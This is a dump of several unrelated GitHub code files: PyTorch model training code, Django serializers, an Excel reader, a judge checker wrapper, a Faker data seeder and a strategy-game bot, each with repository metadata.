all_hist_gpu.to(self.device)\n\n with tqdm(dataloader, desc=self.stage_name, file=sys.stdout, disable=not (self.verbose)) as iterator:\n for x, y in iterator:\n x, y = x.to(self.device), y.to(self.device)\n loss, y_pred = self.batch_update(x, y)\n\n # update loss logs\n loss_value = loss.cpu().detach().numpy()\n loss_meter.add(loss_value)\n loss_logs = {self.loss.__name__: loss_meter.mean}\n logs.update(loss_logs)\n\n all_hist_gpu.add_batch(y_pred,y)\n\n if self.stage_name ==\"train\":\n batch_result=all_hist_gpu.evaluate()\n metrics_meters_logs={}\n\n for metric in self.metrics:\n metrics_meters[metric].add(batch_result[metric])\n metrics_meters_logs[metric]=metrics_meters[metric].mean\n all_hist_gpu.reset()\n logs.update(metrics_meters_logs)\n\n if self.verbose:\n s = self._format_logs(logs)\n iterator.set_postfix_str(s)\n\n if self.stage_name ==\"valid\":\n valid_result=all_hist_gpu.evaluate()\n logs.update(valid_result)\n\n return logs\n\n\nclass TrainEpoch(Epoch):\n\n def __init__(self, model, loss, metrics, optimizer,classes,lr,max_iter,device='cpu', verbose=True):\n super().__init__(\n model=model,\n loss=loss,\n metrics=metrics,\n stage_name='train',\n classes=classes,\n device=device,\n verbose=verbose,\n )\n self.optimizer = optimizer\n self.iter=0\n self.max_iter=max_iter\n self.lr=lr\n\n def on_epoch_start(self):\n self.model.train()\n\n def batch_update(self, x, y):\n self.optimizer.zero_grad()\n prediction = self.model.forward(x)\n loss = self.loss(prediction, y)\n loss.backward()\n\n #poly learning rate\n 
self.optimizer.param_groups[0]['lr']=self.lr*np.power((1-self.iter/self.max_iter),0.9)\n self.iter+=1\n\n self.optimizer.step()\n return loss, prediction\n\n\nclass ValidEpoch(Epoch):\n\n def __init__(self, model, loss, metrics, classes,device='cpu', verbose=True):\n super().__init__(\n model=model,\n loss=loss,\n metrics=metrics,\n stage_name='valid',\n classes=classes,\n device=device,\n verbose=verbose,\n )\n\n def on_epoch_start(self):\n self.model.eval()\n\n def batch_update(self, x, y):\n with torch.no_grad():\n prediction = self.model.forward(x)\n loss = self.loss(prediction, y)\n return loss, prediction\n","repo_name":"Zhaoguanhua/RS_Segmentation-pytorch","sub_path":"utils_me/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17849423229","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport dgl\nfrom sklearn.model_selection import train_test_split\nfrom utils.gcn import HGCN\nfrom utils.helper import logging_helper, earlystop_helper\nfrom utils.metrics import get_accuracy\n\nDIM_INITIAL_FEATURE = 3000 # Dim of initial feature for each node in graph\n\nclass HGCNModel:\n def __init__(self, graph_list:list, buf, target_index:list, feature_list:list=None, dim_hidden:int=200, num_labels:int=2, load_path:str=None, device:str='cuda:0') -> None:\n self.device = torch.device(device)\n self.buf = buf\n \n if feature_list is None:\n feature_list = [torch.randn(graph.number_of_nodes(), DIM_INITIAL_FEATURE).to(self.device) for graph in graph_list]\n elif not len(graph_list) == len(feature_list):\n raise ValueError('graph_list and feature_list must have the same length')\n self.graph_list = [graph.to(self.device) for graph in graph_list]\n self.feature_list = feature_list\n \n self.model = HGCN(num_graph=len(graph_list), target_index=target_index, dim_in=self.feature_list[0].shape[1], dim_hidden=dim_hidden, dim_out=num_labels).to(self.device)\n if load_path is not None:\n self.model.load_state_dict(torch.load(load_path))\n \n def train(self, train_index:torch.Tensor, train_label:torch.Tensor, model_name:str, val_split:bool=True, num_epochs:int=100, lr:float=0.01, early_stop:int=10):\n if val_split:\n train_index, val_index, train_label, val_label = train_test_split(train_index, train_label, test_size=0.2, random_state=42)\n \n if not isinstance(train_label, torch.Tensor):\n train_label = torch.tensor(train_label, dtype=torch.long).to(self.device)\n if not isinstance(val_label, torch.Tensor):\n val_label = torch.tensor(val_label, dtype=torch.long).to(self.device)\n \n loss_func = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda e: 0.9**e)\n \n logging = logging_helper()\n logging.register('loss')\n logging.register('train_acc')\n if val_split:\n logging.register('val_acc')\n earlystopping = earlystop_helper(early_stop, mode='max')\n\n for _ in range(num_epochs):\n self.model.train()\n \n logits = self.get_logits(train_index)\n loss = loss_func(logits, train_label)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n \n train_acc = get_accuracy(train_label, logits.argmax(dim=1))\n \n # log\n logging.log('loss', loss.cpu().item())\n logging.log('train_acc', train_acc.cpu().item())\n \n # val\n if val_split:\n self.model.eval()\n logits = self.get_logits(val_index)\n val_acc = 
get_accuracy(val_label, logits.argmax(dim=1))\n # log\n logging.log('val_acc', val_acc.cpu().item())\n \n if val_split:\n flag = earlystopping.update(val_acc)\n if flag == 1:\n self.save(f'model/hgcn/{model_name}.pkl')\n elif flag == -1:\n logging.step_output(refresh=False)\n break\n \n logging.step_output()\n \n self.load(f'model/hgcn/{model_name}.pkl')\n \n def get_logits(self, index:torch.Tensor):\n logits = self.model(self.graph_list, self.feature_list)\n return logits[index]\n \n def eval(self, index:torch.Tensor):\n logits = self.get_logits(index)\n predict = logits.argmax(dim=1)\n \n return predict\n \n def load(self, load_path:str):\n self.model.load_state_dict(torch.load(load_path))\n \n def save(self, save_path:str):\n torch.save(self.model.state_dict(), save_path)","repo_name":"CarlKilhart/Heterogeneous_Text_Classification","sub_path":"codes/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16030846038","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Gaussian(object):\n def __init__(self, mu, rho):\n super().__init__()\n self.mu = mu.cuda()\n self.rho = rho.cuda()\n self.normal = torch.distributions.Normal(0,1)\n \n @property\n def sigma(self):\n return torch.log1p(torch.exp(self.rho))\n# return torch.clamp(self.rho,1e-8,1)\n\n def sample(self):\n epsilon = self.normal.sample(self.rho.size()).cuda()\n return self.mu + self.sigma * epsilon\n\nclass AttentionLinear(nn.Module):\n def __init__(self, in_features):\n super().__init__()\n self.in_features = in_features\n\n #weight init\n self.weight = nn.Parameter(torch.Tensor(in_features).normal_(0,1))\n self.affine_1 = nn.Parameter(torch.Tensor(1).normal_(0,1))\n self.affine_2 = nn.Parameter(torch.Tensor(1).normal_(0,1))\n\n def forward(self, saver_std, trainer_std, attention, s):\n weight = self.weight * attention\n affine_1, affine_2 = self.affine_1, self.affine_2\n a1 = torch.matmul(trainer_std, weight) * affine_1\n a2 = torch.matmul(saver_std, weight) * affine_2\n mask = torch.sigmoid(s*(a1+a2))\n return mask\n\n\nclass BayesianLinear(nn.Module):\n def __init__(self, in_features, out_features, init_type = 'random', rho_init = -5):\n super().__init__()\n self.in_features = in_features\n self.out_features = out_features\n \n if init_type == 'random':\n \n min_value_mu = -0.2\n max_value_mu = +0.2\n \n else:\n \n min_value_mu = 0\n max_value_mu = 0\n \n min_value_rho = 3\n max_value_rho = 3\n \n # Weight parameters\n #self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-0.2, 0.2))\n self.weight_mu = nn.Parameter(torch.Tensor(out_features, in_features))\n nn.init.kaiming_normal_(self.weight_mu)\n\n #self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(-2.783,-2.783))\n self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(rho_init,rho_init))\n #self.weight_rho = nn.Parameter(torch.Tensor(out_features, in_features).uniform_(0.06,0.06))\n self.weight = Gaussian(self.weight_mu, self.weight_rho)\n\n # Bias parameters\n self.bias_mu = nn.Parameter(torch.Tensor(out_features).uniform_(-0.2, 0.2))\n\n #self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(-2.783,-2.783))\n self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(rho_init,rho_init))\n #self.bias_rho = nn.Parameter(torch.Tensor(out_features).uniform_(0.06,0.06))\n self.bias = 
Gaussian(self.bias_mu, self.bias_rho)\n\n\n def forward(self, input, sample=False):\n if self.training or sample:\n weight = self.weight.sample()\n bias = self.bias.sample()\n else:\n weight = self.weight.mu\n bias = self.bias.mu\n\n return F.linear(input, weight, bias)\n\n def variance_init(self):\n \n min_value_rho = -2.783\n max_value_rho = -2.783\n \n self.weight_rho.data = torch.Tensor(self.out_features, self.in_features).uniform_(min_value_rho,max_value_rho).cuda() # sigma >= 0\n self.bias_rho.data = torch.Tensor(self.out_features).uniform_(min_value_rho,max_value_rho).cuda()\n\nclass BayesianNetwork(nn.Module):\n def __init__(self, inputsize, taskcla, init_type = 'random', rho_init = -5):\n super().__init__()\n\n ncha,size,_=inputsize\n self.taskcla=taskcla\n\n self.l1 = BayesianLinear(28*28, 400, init_type, rho_init)\n self.a1 = AttentionLinear(28*28)\n self.l2 = BayesianLinear(400, 400, init_type, rho_init)\n self.a2 = AttentionLinear(400)\n self.l3 = BayesianLinear(400, 10, init_type, rho_init)\n self.a3 = AttentionLinear(10)\n self.layer_arr = [self.l1, self.l2, self.l3, self.a1, self.a2, self.a3]\n# self.layer_arr = [self.l1, self.l2, ]\n\n\n def forward(self, x, sample=False, saver_net = None, attention = False, s = 1):\n # def forward(self, input, saver_std, trainer_std, attention, s)\n x = x.view(-1, 28*28)\n x = F.relu(self.l1(x, sample))\n saver_std = torch.log1p(torch.exp(self.l1.weight_rho))\n if attention:\n saver_std = torch.log1p(torch.exp(saver_net.l1.weight_rho))\n trainer_std = torch.log1p(torch.exp(self.l1.weight_rho))\n mask = self.a1(x, saver_std, trainer_std, torch.ones(28*28), s)\n self.mask1 = mask\n x = x*mask\n x = F.relu(self.l2(x, sample))\n if attention:\n saver_std = torch.log1p(torch.exp(saver_net.l2.weight_rho))\n trainer_std = torch.log1p(torch.exp(self.l2.weight_rho))\n mask = self.a2(x, saver_std, trainer_std, mask, s)\n self.mask2 = mask\n x = x*mask\n x = self.l3(x, sample)\n if attention:\n saver_std = torch.log1p(torch.exp(saver_net.l3.weight_rho))\n trainer_std = torch.log1p(torch.exp(self.l3.weight_rho))\n mask = self.a3(x, saver_std, trainer_std, mask, s)\n self.mask3 = mask\n x = x*mask\n\n x = F.log_softmax(x, dim=1)\n return x\n \n def variance_init(self):\n \n self.l1.variance_init()\n self.l2.variance_init()\n self.l3.variance_init()\n \n def sample_elbo(self, data, target, BATCH_SIZE, samples=5, saver_net = None, attention = False, s = 1):\n # outputs = torch.zeros(samples, BATCH_SIZE, 10).to(DEVICE)\n outputs = torch.zeros(samples, BATCH_SIZE, 10).cuda()\n\n for i in range(samples):\n outputs[i] = self(data, sample=True, saver_net = saver_net, attention = attention, s = s)\n # print(outputs.type())\n\n loss = F.nll_loss(outputs.mean(0), target, reduction='sum')\n # loss = F.cross_entropy(outputs.mean(0), target, reduction='sum')\n\n return loss\n\n","repo_name":"csm9493/bayesian_continual_learning","sub_path":"core/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23021908624","text":"import xlrd\nimport os\nfilename=\"calcu_result283.xlsx\"\nfilepath=os.path.join(os.getcwd(),filename)\nexcel_data=xlrd.open_workbook(filepath)\nsheet=excel_data.sheet_by_index(0)\nsheet_rows=sheet.nrows\nprint(\"Excel的行数:\",sheet_rows)\nsheet_cols=sheet.ncols\nprint(\"Excle的列数:\",sheet_cols)\nfirst_row=sheet.row_values(0)\nprint(first_row)\ndef Read_data():\n x=[]\n for i in range(sheet_cols):\n if first_row[i] == 
'payment_base':\n print(\"该字段的位置是:\",i)\n #payment_base_data=sheet.col_values(i,1)\n x.append(i)\n continue\n elif first_row[i] == 'hist_payment_base_projection':\n print(\"该字段的位置是:\",i)\n #hist_payment_base_projection_data = sheet.col_values(i,1)\n x.append(i)\n else:\n pass\n return x\na=Read_data()\nfor i in range(len(a)):\n print(sheet.col_values(a[i],1))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hnzhangbinghui/lenovo_auto","sub_path":"From_Excel_Read_Data.py","file_name":"From_Excel_Read_Data.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22990763805","text":"from rest_framework import serializers\n\nfrom pacientes.models import Pacientes\nfrom agendamentos.api.serializers import AgendamentosDetalhesSerializer\n\n\nclass PacientesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Pacientes\n fields = \"__all__\"\n\n\nclass PacientesDetalhesSerializer(serializers.ModelSerializer):\n agendamentos = AgendamentosDetalhesSerializer(many=True, read_only=True)\n\n class Meta:\n model = Pacientes\n fields = [\n 'paciente_id',\n 'nome',\n 'data_nasc',\n 'endereco',\n 'endereco_num',\n 'endereco_bairro',\n 'cep',\n 'cadastro_date',\n 'rg',\n 'agendamentos'\n ]\n","repo_name":"nilton-medeiros/clinica","sub_path":"pacientes/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72644682039","text":"from pathlib import Path\nimport subprocess\nimport signal\nimport os\nfrom DTO.testcaseData import TestcaseData\nfrom constants.Enums import VerdictStatus\nfrom message import *\n\n\ndef getVerdict(testCaseDto: TestcaseData):\n PROBLEM_PATH = f\"./source/{testCaseDto.problemId}\"\n if not Path(f\"{PROBLEM_PATH}/binCheck\").is_file():\n raise Exception(\"PROBLEM\\nBinary file not found\\n maybe check.cpp was compile error\")\n\n os.system(f\"cp {testCaseDto.userPath} ./output.txt\")\n thisCmd = f\"{PROBLEM_PATH}/binCheck {testCaseDto.solPath} {PROBLEM_PATH}/{testCaseDto.testCase}.in {testCaseDto.srcPath}\"\n proc = subprocess.Popen([thisCmd], shell=True, preexec_fn=os.setsid,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n proc.communicate(timeout=5)\n except subprocess.TimeoutExpired:\n os.killpg(os.getpgid(proc.pid), signal.SIGTERM)\n raise Exception(\"PROBLEM\\ncheck.cpp use too much time (more than 5s)\")\n\n if os.path.exists(\"/proc/\" + str(proc.pid)):\n os.killpg(os.getpgid(proc.pid), signal.SIGTERM) # RIP\n t = proc.returncode\n\n if t != 0:\n raise Exception(\"PROBLEM\\ncheck.cpp return non-zero value\")\n\n # ? 
check is grading result file exist\n if not Path(\"./grader_result.txt\").is_file():\n raise Exception(\"PROBLEM\\ngrader_result.txt not found\")\n\n with open(\"./grader_result.txt\", \"r\") as f:\n result = f.read()\n\n try:\n os.system(\"rm ./output.txt\")\n os.system(\"rm ./grader_result.txt\")\n except:\n pass\n\n if len(result.strip()) != 1:\n raise Exception(f\"PROBLEM\\ngrader_result.txt is not valid\\nExpected 1 character but got {result.strip()}\")\n if result.strip() == \"P\":\n return (VerdictStatus.accept, 1.0)\n return (VerdictStatus.reject, 1.0)\n","repo_name":"phakphum-dev/otog-grader","sub_path":"src/evaluate/verdict/cppCheck.py","file_name":"cppCheck.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20528426662","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@文件 :98.py\n@说明 :Please write a program which accepts a string from console and print the characters that have \n\neven indexes.\n\nExample: If the following string is given as input to the program:\n\nH1e2l3l4o5w6o7r8l9d\n\nThen, the output of the program should be:\n\nHelloworld\n@时间 :2020/09/13 08:25:45\n@作者 :martin-ghs\n@版本 :1.0\n'''\n\n\ndef main():\n\n mystr = \"H1e2l3l4o5w6o7r8l9d\"\n print(mystr[::2])\n\nif __name__ == '__main__':\n main()","repo_name":"sakurashima/my-python-exercises-100","sub_path":"programming-exercises/98.py","file_name":"98.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12606535286","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\nMetadata for setting the pwcm package up\n\"\"\"\n\nimport io\n\n__author__ = \"Alberto Pettarin\"\n__email__ = \"alberto@albertopettarin.it\"\n__copyright__ = \"Copyright 2017, Alberto Pettarin (www.albertopettarin.it)\"\n__license__ = \"MIT\"\n__status__ = \"Beta\"\n__version__ = \"0.0.1\"\n\n\n##############################################################################\n#\n# you might need to edit the information below this line\n#\n##############################################################################\n\n# package version\n# NOTE: generate a new one for each PyPI upload, otherwise it will fail\nPKG_VERSION = \"0.0.1\"\n\n# required packages to install\n# NOTE: always use exact version numbers\n# NOTE: this list should be the same as requirements.txt\nPKG_INSTALL_REQUIRES = []\n\n# required packages to install extra tools\nPKG_EXTRAS_REQUIRE = {}\n\n# packages to be distributed\nPKG_PACKAGES = [\n \"pwcm\",\n]\n\n# data files to be distributed\n# NOTE: .py files will be added automatically\nPKG_PACKAGE_DATA = {\n \"pwcm\": [\n \"*.cpp\",\n \"*.h\",\n \"*.md\"\n ],\n}\n\n# scripts to be installed globally\n# on Linux and Mac OS X, use the file without extension\n# on Windows, use the file with .py extension\nPKG_SCRIPTS = []\n\n##############################################################################\n#\n# do not edit the metadata below this line\n#\n##############################################################################\n\n# package name\nPKG_NAME = \"pwcm\"\n\n# package author\nPKG_AUTHOR = \"Alberto Pettarin\"\n\n# package author email\nPKG_AUTHOR_EMAIL = \"alberto@albertopettarin.it\"\n\n# package URL\nPKG_URL = \"https://github.com/pettarin/pwcm\"\n\n# package license\nPKG_LICENSE = \"MIT\"\n\n# human-readable descriptions\nPKG_SHORT_DESCRIPTION = \"\"\"A minimal working example of\nC++ function 
multiversioning in Python wheels.\"\"\"\ntry:\n PKG_LONG_DESCRIPTION = io.open(\"README.rst\", \"r\", encoding=\"utf-8\").read()\nexcept:\n PKG_LONG_DESCRIPTION = PKG_SHORT_DESCRIPTION\n\n# PyPI keywords\nPKG_KEYWORDS = [\n \"C\",\n \"Python wheel\",\n \"Python\",\n \"function multiversioning\",\n \"function\",\n \"gcc\",\n \"multiversion function\"\n \"multiversion\",\n \"multiversioning\",\n \"wheel\",\n]\n\n# PyPI classifiers\nPKG_CLASSIFIERS = [\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: C\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n]\n","repo_name":"pettarin/pwcm","sub_path":"setupmeta.py","file_name":"setupmeta.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33555625754","text":"from pandas import read_csv\nimport os\n\npath = os.path.abspath('../../predict_project/data/total.csv')\ndef read_file(path):\n\n print(path)\n # 读取数据\n data = read_csv(path, encoding='gb18030',sep=',')\n data.drop('序号', axis=1, inplace=True) # 删除序号\n\n data.drop('备注', axis=1, inplace=True) # 删除备注\n data.drop('求和', axis=1, inplace=True) # 删除备注\n data = data.to_dict(orient='records')\n print(data[0])\n # for i in data:\n # print(i.keys())\n return data\n\n\n# read_file(path)\n\n# a = {\"name\":15,\"as\":1,\"b\":12\n# }\n# a[\"ax\"] = a.pop(\"as\")\n# print(a)","repo_name":"Alenhuoga/liquid-metal","sub_path":"demo/tools/read_file.py","file_name":"read_file.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"38686238549","text":"import os\nimport random\nfrom faker import Faker\n\n# Configura Django antes de importar los modelos\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'financialsystem.settings')\nimport django\ndjango.setup()\n\nfrom faker import Faker\nfrom adviser.models import Adviser\nfrom clients.models import Client, PhoneNumberClient\nfrom credit.models import Credit\nfrom cashregister.models import CashRegister, Movement\nfrom guarantor.models import Guarantor\n\n\nfake = Faker()\n\ndef create_fake_clients_and_phone_numbers(num_records):\n advisers = Adviser.objects.all()\n cash_registers = CashRegister.objects.all()\n\n for _ in range(num_records):\n adviser = fake.random_element(advisers)\n cash_register = fake.random_element(cash_registers)\n \n guarantor = Guarantor.objects.create(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n email=fake.email(),\n civil_status=fake.random_element(Client.CivilStatus)[0],\n dni=fake.random_number(digits=8),\n profession=fake.job().replace(',', ' '),\n address=fake.address().replace(',', ' '),\n job_address=fake.address().replace(',', ' '),\n )\n\n client = Client.objects.create(\n first_name=fake.first_name(),\n last_name=fake.last_name(),\n adviser=adviser,\n email=fake.email(),\n civil_status=fake.random_element(Client.CivilStatus)[0],\n 
dni=fake.random_number(digits=8),\n profession=fake.job().replace(',', ' '),\n address=fake.address().replace(',', ' '),\n score=fake.random_int(min=0, max=1500),\n job_address=fake.address().replace(',', ' '),\n )\n print(f\"Client {client.pk} created\")\n PhoneNumberClient.objects.create(\n phone_number_c=fake.phone_number(),\n phone_type_c=fake.random_element(PhoneNumberClient.PHONETYPE)[0],\n client=client,\n )\n \n credit = Credit.objects.create(\n interest=40,\n amount=fake.pydecimal(left_digits=5, right_digits=2, positive=True),\n installment_num=fake.random_int(min=1, max=12),\n start_date=fake.date_time_this_year(),\n client=client,\n guarantor=guarantor,\n has_pay_stub= fake.pybool(),\n )\n \n\n\n movement = Movement.objects.create(\n amount=credit.amount,\n description=fake.text(max_nb_chars=20,),\n money_type=fake.random_element(Movement.MONEY_TYPE)[0],\n cashregister=cash_register,\n user=adviser,\n operation_mode=Movement.OPERATION_CHOISE[1][0],\n )\n print(f\"Movement {movement.pk} created\")\n credit.mov=movement;\n credit.save()\n\n print(f\"Credit {credit.pk} created\")\nif __name__ == '__main__':\n num_records = 10 # Establece el número de registros que deseas crear\n create_fake_clients_and_phone_numbers(num_records)\n","repo_name":"oscar3873/financial-system","sub_path":"financialsystem/fakedata.py","file_name":"fakedata.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38375368700","text":"from model.hero import *\nfrom model.map import Map\nfrom model.parameters import Parameters\nfrom model.state import State\nfrom model.abilites import AbilityType\nfrom model.teams import Teams\nimport json\nimport datetime\nimport random\nimport time\n\n\nfile = open(\"debug.txt\", \"w\")\nfile.write(\"hyita \" + '\\n')\n\n\ngame = json.loads(input())\ngame_map = Map(game) # карта игрового мира\ngame_params = Parameters(game) # параметры игры\ngame_teams = Teams(game) # моя команда\n\ntimestart = datetime.datetime.now().second\nstep = 0\n\nwhile True:\n try:\n \"\"\" Получение состояния игры \"\"\"\n state = State(input(), game_teams, game_params)\n\n my_buildings = state.my_buildings()\n my_squads = state.my_squads()\n # сортируем по остаточному пути\n my_squads.sort(key=lambda c: c.way.left, reverse=False)\n\n enemy_buildings = state.enemy_buildings()\n enemy_squads = state.enemy_squads()\n\n neutral_buildings = state.neutral_buildings()\n\n forges_buildings = state.forges_buildings()\n\n step += 1\n \"\"\" Играем за мага \"\"\"\n if game_teams.my_her.hero_type == HeroType.Mag:\n # 1 проверяем доступность абилки Чума\n if state.ability_ready(AbilityType.Plague):\n file.write(\"1\\n\")\n print(game_teams.my_her.plague(enemy_buildings[0].id))\n enemy_buildings[0].buff_mask | 4\n timefirstplague = datetime.datetime.now().second\n # 2 захватываем нейтральные башни до 50 хода\n if step < 20:\n file.write(\"2.2\\n\")\n for i in range (0, len(my_buildings)):\n for neutral_building in neutral_buildings:\n distance = game_map.towers_distance(my_buildings[i].id, neutral_building.id)\n if (distance < 3) and my_buildings[i].creeps_count > 15: \n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.65))\n my_buildings[0].creeps_count -= 0.65 * my_buildings[i].creeps_count\n \n\n # 3 захватываем нейтральные башни этой тактикой начиная с 51 хода\n if step > 51:\n file.write(\"3\\n\")\n for i in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 11:\n for 
neutral_building in neutral_buildings:\n distance = game_map.towers_distance(my_buildings[i].id, neutral_building.id)\n if (distance < 5 and len(neutral_buildings) > 6):\n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.9))\n my_buildings[i].creeps_count -= 0.9 * my_buildings[i].creeps_count\n break\n # 3.1 если нейтральных башен мало или они далеко тогда отправляем из двух башен отряд\n elif len(neutral_buildings) < 4 and i + 1 < len(my_buildings):\n file.write(\"3.1\\n\")\n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.5))\n print(game_teams.my_her.move(my_buildings[i + 1].id, neutral_building.id, 0.5))\n my_buildings[i].creeps_count -= 0.5 * my_buildings[i].creeps_count \n my_buildings[i + 1].creeps_count -= 0.5 * my_buildings[i + 1].creeps_count \n break\n elif (my_buildings[i].creeps_count > 10 and len(my_buildings) > 4):\n print(game_teams.my_her.move(my_buildings[i].id, neutral_building.id, 0.7))\n my_buildings[i].creeps_count -= 0.7 * my_buildings[i].creeps_count\n break\n\n # 4 проверяем доступность абилки Обмен башнями\n if state.ability_ready(AbilityType.Build_exchange):\n file.write(\"4\\n\")\n if len(my_buildings) > 4:\n k = 0\n for my_building in my_buildings:\n if k == 0:\n if my_building.creeps_count < 5:\n for enemy_building in enemy_buildings:\n if enemy_building.creeps_count > 18 and enemy_building.buff_mask & 4 != 4:\n print(game_teams.my_her.exchange(enemy_building.id, my_building.id))\n k = 1\n break\n\n for j in range (0, len(enemy_buildings)):\n k = 0\n list1 = []\n for i in range (0, len(my_buildings)):\n distance = game_map.towers_distance(my_buildings[i].id, enemy_buildings[j].id)\n if distance < 5 and my_buildings[i].creeps_count > 5:\n k += 1\n list1.append(str(i))\n if k >= 2 :\n print(game_teams.my_her.move(my_buildings[int(list1[0])].id, enemy_buildings[j].id, 0.8))\n print(game_teams.my_her.move(my_buildings[int(list1[1])].id, enemy_buildings[j].id, 0.8))\n my_buildings[int(list1[0])].creeps_count -= 0.8 * my_buildings[int(list1[0])].creeps_count\n my_buildings[int(list1[1])].creeps_count -= 0.8 * my_buildings[int(list1[1])].creeps_count\n \n # 5 Upgrade башни\n for my_building in my_buildings:\n if my_building.level.id <= len(game_params.tower_levels) - 1:\n # Если хватает стоимости на upgrade\n update_coast = game_params.get_tower_level(my_building.level.id + 1).update_coast\n if update_coast < my_building.creeps_count:\n print(game_teams.my_her.upgrade_tower(my_building.id))\n my_building.creeps_count -= update_coast\n file.write(\"5\\n\")\n \n # 6 атакуем башню neutral\n if step % 5 == 0 and len(neutral_buildings) > 0:\n file.write(\"6\\n\")\n for i in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 13:\n print(game_teams.my_her.move(my_buildings[i].id, neutral_buildings[0].id, 0.8))\n my_buildings[i].creeps_count -= 0.8 * my_buildings[i].creeps_count\n if (i + 1 < len(my_buildings)):\n if my_buildings[i + 1].creeps_count > 10:\n print(game_teams.my_her.move(my_buildings[i + 1].id, neutral_buildings[0].id, 0.5))\n my_buildings[i + 1].creeps_count -= 0.7 * my_buildings[i + 1].creeps_count\n break\n\n # 7 атакуем башню противника\n if step % 3 == 0 or len(neutral_buildings) < 2:\n file.write(\"7\\n\")\n for i in range (0, len(my_buildings)):\n if (i + 1 < len(my_buildings)):\n if my_buildings[i].creeps_count > 10 and my_buildings[i + 1].creeps_count > 10:\n if (len(enemy_buildings) > 2):\n print(game_teams.my_her.move(my_buildings[i].id, enemy_buildings[2].id, 0.75))\n 
print(game_teams.my_her.move(my_buildings[i + 1].id, enemy_buildings[2].id, 0.75))\n my_buildings[i].creeps_count -= 0.75 * my_buildings[i].creeps_count\n my_buildings[i + 1].creeps_count -= 0.75 * my_buildings[i + 1].creeps_count\n break\n # 7.1 ускорение\n if len(my_squads) > 4:\n if state.ability_ready(AbilityType.Speed_up):\n location = game_map.get_squad_center_position(my_squads[2])\n print(game_teams.my_her.speed_up(location)) \n # 7.2 поменяла башню и отправила туда солдат \n if step % 14 == 0:\n file.write(\"7.2\\n\")\n for i in range (0, len(my_buildings)):\n for j in range (0, len(my_buildings)):\n if my_buildings[i].creeps_count > 10 and my_buildings[j].creeps_count < 5:\n print(game_teams.my_her.move(my_buildings[i].id, my_buildings[j].id, 0.2))\n my_buildings[j].creeps_count += 0.2 * my_buildings[i].creeps_count\n my_buildings[i].creeps_count -= 0.2 * my_buildings[i].creeps_count\n break\n if state.ability_ready(AbilityType.Build_exchange):\n k = 0\n for my_building in my_buildings:\n if k == 0:\n if my_building.creeps_count < 10:\n for enemy_building in enemy_buildings:\n if enemy_building.buff_mask & 4 != 4:\n print(game_teams.my_her.exchange(enemy_building.id, my_building.id))\n k = 1\n break \n\n # 8 когда нейтральных башен не осталось начинаем атаковать вражеские\n if step % 3 != 0:\n file.write(\"8\\n\")\n if len(neutral_buildings) < 2:\n if (len(my_buildings) > 1):\n for i in range (0, len(my_buildings)):\n for j in range (0, len(enemy_buildings)):\n distance = game_map.towers_distance(my_buildings[i].id, enemy_buildings[j].id)\n if (i + 1 < len(my_buildings) and distance < 5):\n if (my_buildings[i].creeps_count + my_buildings[i + 1].creeps_count - 5 > enemy_buildings[j].creeps_count):\n 